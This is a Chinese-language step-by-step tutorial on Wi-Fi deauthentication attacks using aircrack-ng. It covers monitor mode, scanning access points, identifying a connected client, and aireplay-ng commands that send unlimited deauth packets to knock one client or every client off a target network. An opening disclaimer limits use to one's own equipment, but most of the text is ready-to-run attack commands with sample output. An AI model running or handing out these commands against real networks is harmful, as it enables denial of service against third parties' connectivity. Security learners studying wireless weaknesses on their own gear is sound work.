中斷無線網路的方法
警告:此方法只能用於自己的無線網路裝置,目的應該是了解無線網路運作,絕對不能造成他人的困擾或損失,我們應該秉持所有人類都是同胞的心態。就算你的鄰居或同學很令你厭煩,也千萬不能將這個用在他身上,你唯一能作的就是替他祈禱。
環境建議:
本機安裝的linux
(虛擬機或docker不一定有權限直接操作物理的wifi網路卡)
Ubuntu/Debian/Linux mint
1.下載無線網路工具aircrack
更新軟體庫
sudo apt update
安裝aircrack-ng軟體
sudo apt install aircrack-ng
2.檢查wifi網路卡名稱
找到自己的wifi網路卡名稱
iwconfig
以我的筆電來說無線網卡的開頭名稱常常是wl
就像這樣(為了安全這裡的數值都更改過,非原數值)
wlp3s0 IEEE 802.11 ESSID:"alex"
Mode:Managed Frequency:2.462 GHz Access Point: FF:FF:FF:FF:FF:FF
Bit Rate=72.2 Mb/s Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Link Quality=52/70 Signal level=-58 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:19 Missed beacon:0
我的網卡名稱是wlp3s0
3.監聽模式
把網卡切換成監聽模式
sudo airmon-ng start wlp3s0(這裡改成你的網卡名稱)
檢查網卡名稱是否變成監聽模式的名稱
iwconfig
來看看我的網卡名稱是否改變
wlp3s0mon IEEE 802.11 Mode:Monitor Frequency:2.462 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
我的網卡名稱變成wlp3s0mon了,成功進入監聽模式
4.開始蒐集所有wifi熱點資訊
顯示監聽結果
sudo airodump-ng wlp3s0mon(你的網卡名稱)
我們這時可以看到周遭所有啟動的wifi熱點基地台
CH 4 ][ Elapsed: 12 s ][ 2021-05-03 11:33
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EE:EE:EE:AA:AA:AA -72 30 3 0 11 130 WPA2 CCMP PSK alice
DD:DD:DD:DD:DD:DD -60 34 0 0 6 65 WPA2 CCMP PSK bob
這裡我們可以看到有兩個熱點,看到ESSID那欄,名稱分別是alice跟bob
我們的目標是alice
BSSDID是,這有點類似車牌,可是區分出無線網路中的不同裝置
alice的熱點的BSSID:
EE:EE:EE:AA:AA:AA
然後這時候看到CH那一欄 alice的CH(頻道)是:
11
5.監聽目標wifi熱點
這時候我們可以來看看有誰連上alice的wifi熱點
sudo airodump-ng --bssid EE:EE:EE:AA:AA:AA --channel 11 wlp3s0mon
監聽到的結果
CH 11 ][ Elapsed: 8 mins ][ 2021-05-03 11:54 ][ WPA handshake: EE:EE:EE:AA:AA:AA
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EE:EE:EE:AA:AA:AA -64 100 1152 332 0 11 65 WPA2 CCMP PSK alex
BSSID STATION PWR Rate Lost Frames Notes Probes
EE:EE:EE:AA:AA:AA CC:CC:CC:CC:CC:CC -67 1e- 0e 0 193 EAPOL alex
注意看底下STATION那個欄位有一個奇怪的MAC位址:
CC:CC:CC:CC:CC:CC
啊!原來有一個人連上了alice的wifi熱點,他的MAC位址是CC:CC:CC:CC:CC:CC
我們幫它取名為Peter吧~
Peter的電腦網卡MAC位置是CC:CC:CC:CC:CC:CC
6.中斷無線網路
我們現在用下面這條指令中斷Peter的連線
sudo aireplay-ng --deauth 0 -c CC:CC:CC:CC:CC:CC -a EE:EE:EE:AA:AA:AA wlp3s0mon
加上註解
sudo aireplay-ng --deauth(中斷登入攻擊) 0(0代表無限次) -c CC:CC:CC:CC:CC:CC(被攻擊者peter的MAC位址) -a EE:EE:EE:AA:AA:AA(alice的wifif熱點ID) wlp3s0mon(網卡名稱)
如果想要中斷所有使用者
sudo aireplay-ng --deauth 0 -a EE:EE:EE:AA:AA:AA wlp3s0mon
7.復原自己的無線網路狀態
我們測試完畢了,把無線網卡從監聽狀態回復為一般狀態
sudo airmon-ng stop wlp3s0mon
不復原網卡你就無法正常上網